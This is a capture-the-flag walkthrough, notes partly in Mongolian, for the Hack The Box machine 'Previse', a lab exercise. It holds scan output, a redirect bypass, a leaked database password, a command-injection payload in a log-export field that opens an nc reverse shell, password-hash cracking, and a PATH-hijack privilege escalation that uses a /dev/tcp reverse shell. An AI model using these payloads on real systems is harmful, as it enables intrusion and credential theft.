PS: Үүсгэсэн огноо: 2021 оны 11-р сарын 10~ өдрүүдэд бичсэн тэмдэглэл юм.
1. IP Address
# Machine Address
10.10.11.104
# Local Address
10.10.14.139
2. Nmap
sudo nmap -sC -sV -oA nmap/previse 10.10.11.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 05:45 EST
Nmap scan report for 10.10.11.104
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.40 seconds
3. Gobuster
gobuster dir -u http://10.10.11.104 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/11/10 05:49:15 Starting gobuster in directory enumeration mode
===============================================================
/download.php (Status: 302) [Size: 0] [--> login.php]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
Progress: 13674 / 441122 (3.10%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/11/10 05:54:51 Finished
===============================================================
nav.php
-> CREATE ACCOUNT LINK
4. Burp
GET /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://10.10.11.104/nav.php
Cookie: PHPSESSID=n8t6btqpv1in2cbte4c82i9ggh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Do Intercept -> Response to this request
дараад forward
хийнэ. Дараагаар 302
гарч ирж байгааг 200
боглон forward хийнэ. Browser руу ороод харвал create user харагдаж байна. Шинэ user үүсгээд нэвтрэн орно.
5. Reverse Shell
File menu хэсэгт Backup файл байгаа татаж аваад config.php харвал:
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
Request Log Data Menu - comma татах үеийн burp:
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.11.104
DNT: 1
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=n8t6btqpv1in2cbte4c82i9ggh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
delim=comma
Netcat:
nc -lvnp 9001
Reverse Shell:
delim=comma%26nc+-e+/bin/sh+10.10.14.139+9001
shell орсон бол:
python3 \-c 'import pty;pty.spawn("/bin/sh")'
Backup доторх config.php info дээрээс харахад mysql руу орох боломжтой:
mysql -u root -D previse -p
Tables:
SHOW TABLES' at line 2
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)
mysql>
Accounts:
mysql> SELECT * FROM accounts;
SELECT * FROM accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | ca4mi | $1$🧂llol$DHtkJzt.08/KEY8tpvplO0 | 2021-11-10 11:01:53 |
| 3 | ashot | $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// | 2021-11-10 11:22:18 |
+----+----------+------------------------------------+---------------------+
3 rows in set (0.00 sec)
User: m4lwhere Password: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
hashcat -a 3 -m 500 hash.txt rockyou.txt
ilovecody112235!
SHH хандах
ssh m4lwhere@10.10.11.104
User.txt
90a************
6. Privilege Escalation
sudo -l
:
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
/opt/scripts/access_backup.sh
@vm:
nc -lvnp 9001
@Machine:
echo "bash -i >& /dev/tcp/10.10.14.139/9001 0>&1" > gzip
chmod 777 gzip
export PATH=/tmp:$PATH
/tmp
дотор байгаа болохоор бичлээ. Өөр газар байгаа бол **$(pwd):$PATH
sudo -l
-с гарч ирсэн .sh
run:
sudo /opt/scripts/access_backup.sh
root.txt
9dc5eb************